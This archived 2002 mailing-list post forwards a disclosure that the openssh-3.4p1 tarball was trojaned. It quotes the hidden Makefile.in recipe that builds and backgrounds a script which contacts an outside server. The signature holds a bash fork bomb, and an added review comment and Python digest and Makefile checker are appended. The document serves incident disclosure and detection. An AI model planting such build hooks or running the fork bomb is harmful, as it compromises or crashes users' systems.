From: Fred Cohen <fc@all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Date: Thu, 1 Aug 2002 19:45:37 -0700 (PDT)
Subject: [iwar] [fc:openssh-3.4p1.tar.gz.distribution.recently.trojaned]

From <http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security>

----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-testbf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |  Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |  Weblog: http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   |  Interested in MUDs? http://www.FatalDimensions.org/

------------------
http://all.net/
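Review bot: the recipe line added under `all:` in openbsd-compat/Makefile.in should not execute anything. It runs the freshly compiled bf-test and then runs bf-test.out with `sh` in the background, and the leading `@` keeps the whole command out of the make output. Building libopenbsd-compat.a needs neither step, so the line should be removed and bf-test.c accounted for before this tree is built anywhere.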
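The two indicators in the forwarded message, turned into checks (an added example, not part of the original message or of OpenSSH): it compares an archive's MD5 with the two values quoted above and scans Makefile and Makefile.in members for recipe lines that compile something and then execute it. The regular expressions, the function names and the in-memory sample archive are assumptions of this example; only the two digests, the file path and the recipe text come from the page.

```python
import hashlib, io, re, tarfile

# MD5 values quoted in the message (the only digests the page publishes).
PORTS_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"

# Heuristic assumed by this example: a recipe that calls the compiler and also
# executes a file from the build directory (optionally through sh).
COMPILE = re.compile(r"\$\(CC\)|\b(?:cc|gcc)\b")
EXECUTE = re.compile(r"(?:^|[;&|]\s*)(?:sh\s+)?\./\S+")
MAKEFILE = re.compile(r"(?:^|/)Makefile(?:\.in)?$")

def classify_digest(data: bytes) -> str:
    """Compare an archive's MD5 with the two values from the message."""
    digest = hashlib.md5(data).hexdigest()
    return {TROJANED_MD5: "trojaned", PORTS_MD5: "matches-ports"}.get(digest, "unknown")

def suspicious_recipes(data: bytes) -> list:
    """Return (member, recipe) for Makefile recipes that compile and then execute."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not (member.isfile() and MAKEFILE.search(member.name)):
                continue
            text = tar.extractfile(member).read().decode("latin-1")
            for line in text.splitlines():
                if not line.startswith("\t"):  # recipe lines start with a tab
                    continue
                recipe = line.strip().lstrip("@-+ ")  # drop make's silent/ignore prefixes
                if COMPILE.search(recipe) and EXECUTE.search(recipe):
                    hits.append((member.name, recipe))
    return hits

def build_sample(recipe: str) -> bytes:
    """Constructed stand-in archive: one Makefile.in with `recipe` under all:."""
    body = ("all: libopenbsd-compat.a\n\t" + recipe + "\n").encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

if __name__ == "__main__":
    # Recipe text copied as it appears on this page; the archive around it is constructed.
    sample = build_sample("@ $(CC) bf-test.c -o bf-test; ./bf-testbf-test.out; sh ./bf-test.out &")
    print(classify_digest(sample), suspicious_recipes(sample))
```

The digest comparison is the authoritative check for this particular tarball; the recipe scan is a triage aid that also flags the same pattern in an archive whose digest is not one of the two listed.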
This archive was generated by hypermail 2.1.2 : 2002-10-01 06:44:32 PDT